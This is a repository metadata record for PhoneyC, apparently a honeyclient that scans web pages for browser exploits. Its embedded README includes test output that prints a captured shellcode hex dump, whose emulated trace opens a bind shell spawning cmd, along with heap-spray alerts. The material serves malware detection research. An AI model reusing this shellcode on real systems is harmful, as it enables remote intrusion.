{"id":18023503,"url":"https://github.com/buffer/phoneyc","last_synced_at":"2025-03-27T00:30:38.214Z","repository":{"id":31195260,"uuid":"34755989","full_name":"buffer/phoneyc","owner":"buffer","description":null,"archived":false,"fork":false,"pushed_at":"2015-05-22T14:17:11.000Z","size":3395,"stargazers_count":16,"open_issues_count":0,"forks_count":22,"subscribers_count":5,"default_branch":"master","last_synced_at":"2025-03-22T17:23:32.576Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/buffer.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"COPYING","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2015-04-28T21:08:22.000Z","updated_at":"2023-11-08T01:44:50.000Z","dependencies_parsed_at":"2022-09-09T05:11:25.595Z","dependency_job_id":null,"html_url":"https://github.com/buffer/phoneyc","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/buffer%2Fphoneyc","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/buffer%2Fphoneyc/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/buffer%2Fphoneyc/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/buffer%2Fphoneyc/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/buffer","download_url":"https://codeload.github.com/buffer/phoneyc/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245760536,"owners_count":20667886,"icon_url":"https://github.com/github.png","version":
null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-10-30T07:09:45.951Z","updated_at":"2025-03-27T00:30:37.051Z","avatar_url":"https://github.com/buffer.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"Requirements:\n=============\n\n* libemu-svn\n  Homepage: http://libemu.carnivore.it/\n  Get the libemu code via Git and build it as documented on the reference\n  website \n    \n* curl\n  Homepage: http://curl.haxx.se/\n\n\nCompile the modules:\n====================\n\n(Optional) \nIf you need to compile the modules with a specific Python version you can \ndo it through the PHONEYC_PYTHON environment variable, i.e. simply exporting \nthe variable this way before moving on: \n\n    $ export PHONEYC_PYTHON=python2.5\n\nwill force the build system to use python2.5 instead of the default one. \nOtherwise skip this step.\n\n(Required)\n\n* Option #1\n\nBuild the code by executing these commands \n\n    $ cd modules\n    $ make\n    $ make install\n\nPlease note that you don't need root privileges when running `make install'.\nThis option could cause you a few troubles at compile time. In such a case\nplease refer to option #2.\n\n* Option #2\n\nThis is the simplest and most straightforward way to install PhoneyC but it \nrequires root privileges. 
This option should be used as a fallback in case \noption #1 raises some troubles.\n\nIf you're running PhoneyC on one of the following Linux distributions\n\n\t* Debian\n\t* Ubuntu\n\t* Gentoo\n\nyou can build the code by simply running\n\n\t# make [debian|ubuntu|gentoo] \n\nand everything should be setup properly.\n\n\nTest the installation:\n======================\n\nIn order to test the installation simply run it on a sample malicious \npage in samples/ directory as shown below. \n\n    buffer@alnitak ~/honeynet/phoneyc $ python phoneyc.py file://samples/4158.html\n    [2011-01-17 11:32:47] [ALERT] NeoTracePro.TraceTarget overflow in arg0\n    Log written into: log/ad5048081277127857aad08e0bfd5e55\n\n====================================\n    |--------AID:1----------\n    |ATYPE:ALERT_SHELLCODE\n    |MESSAGE:Shellcode Detected!\n    |MISC:{}\n    |LENGTH:752\n    |SHELLCODE:\n    eb0359eb05e8f8ffffff494937494949494949494949494949494949515a6a625830423050416b41417232414241423242413042415838414250757a496b4c435a586b726d4d385969496f496f696f51704c4b324c446441344e6b4735474c4e6b634c7445325853315a4f4c4b726f75486e6b536f57503661486b63794e6b70346c4b64416a4e54714f304f696e4c6b344f30516444475a61395a544d44416f324a4b4964656b42746464713861655a456e6b636f65746551786b55366c4b666c504b4c4b514f476c4551786b7773546c6e6b4e69724c6134576c42414f3346514b6b31744c4b715350304c4b6150666c6c4b3430376c4c6d4c4b47306778414e73586e6e326e766e5a4c76304b4f48564246727375364358347374724248543732533472736f42746b4f7a707068584b586d4b4c774b30504b4f5a76536f6d594b5563564f716a4d533834426635724a4442396f385050686e3964494b456e4d30574b4f49465363305363633633536331535143304333634b4f4a7050667178496d524c435656334c494d316e7550684c64345a50706f374637396f4e36706a745043617635796f585061786d744e4d764e6d395277796f4e3633633365496f4a705358497537394e66704946374b4f4e366630763466346635696f48507a33424839777079784631695057396f6b665365696f68506536735a6534706631785173724d6f796d35317a427066394139584c6e694867735a73746e696a423741395038736c6a4b
4e7732446d4b4e4732646c6d436e6d707a30386c6b6c6b4e4b635870724b4e4e5356764b694867735a73746e696a423741395038736c6a4b4e7732446d4b4e4732646c6d436e6d707a30386c6b6c6b4e4b635870724b4e4e5356764b4f42553044596f7946636b70577272727146315051324a64417051327141454631396f6a7063584c6d6e395775584e4363496f6b66517a4b4f6b4f7567696f68504e6b3637396c4c4338445064496f5a764632496f7a7075386c306e6a4554714f46336b4f4e366b4f6e3062\n    |Now run it:\n    [{'rettype': 'HMODULE', 'retval': 1906376704, 'name': 'LoadLibraryA', 'arguments': [('LPCTSTR', 'lpFileName', ('', '', 'ws2_32'))]}, {'rettype': 'int', 'retval': 0, 'name': 'WSAStartup', 'arguments': [('WORD', 'wVersionRequested', 2), ('LPWSADATA', 'lpWSAData', 1244276)]}, {'rettype': 'SOCKET', 'retval': 66, 'name': 'WSASocket', 'arguments': [('int', 'af', 2), ('int', 'type', 1), ('int', 'protocol', 0), ('LPWSAPROTOCOL_INFO', 'lpProtocolInfo', 0), ('GROUP', 'g', 0), ('DWORD', 'dwFlags', 0)]}, {'rettype': 'int', 'retval': 0, 'name': 'bind', 'arguments': [('SOCKET', 's', 66), ('sockaddr_in *', 'name', ('', '', [('short', 'sin_family', 2), ('unsigned short', 'sin_port', 27901), ('in_addr', 'sin_addr', [('unsigned long', 's_addr', '0.0.0.0')]), ('char', 'sin_zero', '       ')])), ('int', 'namelen', 16)]}, {'rettype': 'int', 'retval': 0, 'name': 'listen', 'arguments': [('SOCKET', 's', 66), ('int', 'backlog', 2)]}, {'rettype': 'SOCKET', 'retval': 68, 'name': 'accept', 'arguments': [('SOCKET', 's', 66), ('sockaddr *', 'addr', ('', '', [])), ('int', 'addrlen', None)]}, {'rettype': 'int', 'retval': 0, 'name': 'closesocket', 'arguments': [('SOCKET', 's', 66)]}, {'rettype': 'BOOL', 'retval': -1, 'name': 'CreateProcess', 'arguments': [('LPCWSTR', 'pszImageName', ('', '', 'g\\x12')), ('LPCWSTR', 'pszCmdLine', ('', '', 'cmd')), ('LPSECURITY_ATTRIBUTES', 'psaProcess', None), ('LPSECURITY_ATTRIBUTES', 'psaThread', None), ('BOOL', 'fInheritHandles', 1), ('DWORD', 'fdwCreate', 0), ('LPVOID', 'pvEnvironment', None), ('LPWSTR', 'pszCurDir', None), ('LPSTARTUPINFOW', 
'psiStartInfo', ('', '', [('DWORD', 'cb', 0), ('LPTSTR', 'lpReserved', 0), ('LPTSTR', 'lpDesktop', 0), ('LPTSTR', 'lpTitle', 0), ('DWORD', 'dwX', 0), ('DWORD', 'dwY', 0), ('DWORD', 'dwXSize', 0), ('DWORD', 'dwYSize', 0), ('DWORD', 'dwXCountChars', 0), ('DWORD', 'dwYCountChars', 0), ('DWORD', 'dwFillAttribute', 0), ('DWORD', 'dwFlags', 0), ('WORD', 'wShowWindow', 0), ('WORD', 'cbReserved2', 0), ('LPBYTE', 'lpReserved2', 0), ('HANDLE', 'hStdInput', 0), ('HANDLE', 'hStdOutput', 0), ('HANDLE', 'hStdError', 0)])), ('PROCESS_INFORMATION', 'pProcInfo', ('', '', [('HANDLE', 'hProcess', 4711), ('HANDLE', 'hThread', 4712), ('DWORD', 'dwProcessId', 4712), ('DWORD', 'dwThreadId', 4714)]))]}, {'rettype': 'DWORD', 'retval': 0, 'name': 'WaitForSingleObject', 'arguments': [('HANDLE', 'hHandle', 4712), ('DWORD', 'dwMilliseconds', -1)]}]\n\n====================================\n    |--------AID:2----------\n    |ATYPE:ALERT_HEAPSPRAY\n    |MESSAGE:Heapspray Detected!\n    |HIT:8\n    |MEMUSAGE:4193496\n    |LENGTH:4193496\n    |ENTROPY:0.0\n    |MISC:{'sledge_char': 'A', 'sec_char_cnt': 0, 'sledge_cnt': 4193496, 'sec_char': '\\x00'}\n\n====================================\n    |--------AID:3----------\n    |ATYPE:ALERT_HEAPSPRAY\n    |MESSAGE:Heapspray Detected!\n    |HIT:1\n    |MEMUSAGE:4193496\n    |LENGTH:4193496\n    |ENTROPY:0.0\n    |MISC:{'sledge_cnt': 4193496, 'sec_char_cnt': 0, 'sec_char': '\\x00', 'sledge_char': 'A'}\n\n====================================\n    |--------AID:4----------\n    |ATYPE:ALERT_HEAPSPRAY\n    |MESSAGE:Heapspray Detected!\n    |HIT:20\n    |MEMUSAGE:83884960\n    |LENGTH:4194248\n    |ENTROPY:0.00344388991898\n    |MISC:{'sledge_char': 'A', 'sec_char_cnt': 33, 'sledge_cnt': 4193514, 'sec_char': 'K'}\n\n\nRun it:\n=======\n\n    $ python phoneyc.py 
URL-you-want-to-examine\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbuffer%2Fphoneyc","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbuffer%2Fphoneyc","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbuffer%2Fphoneyc/lists"}